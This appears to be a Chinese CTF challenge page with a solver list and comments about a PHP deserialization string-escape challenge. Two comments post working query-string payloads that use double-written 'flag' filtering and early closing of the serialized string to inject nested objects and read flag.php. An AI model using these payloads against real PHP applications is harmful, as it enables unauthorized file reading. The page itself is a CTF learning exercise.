评分(1)
解题动态

GnawKing 攻破了该题 7天前

kk190 攻破了该题 10天前

Waitcat 攻破了该题 1月前

Sh_eePppp 攻破了该题 2月前

snoway34 攻破了该题 2月前

ssqs 攻破了该题 2月前

小杰罗666 攻破了该题 2月前

Deyudeyu 攻破了该题 2月前

czg9000 攻破了该题 2月前

A1234467 攻破了该题 2月前

wangdashuai 攻破了该题 3月前

dir_tree 攻破了该题 3月前

TOMCAT336699 攻破了该题 3月前

2165518579牛逼 攻破了该题 3月前

t1tl3d 攻破了该题 3月前

zzhicecyb 攻破了该题 3月前

Jokerz 攻破了该题 4月前

zxingxing121 攻破了该题 4月前

19581700609 攻破了该题 4月前

评论
whiteHaves 8月前
举报
参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。
绝情且小帅 11月前
举报
?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
xiaobai568 1年前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 1年前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 1年前
举报
不容易啊
2728462336 1年前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 1年前
举报
反序列化字符逃逸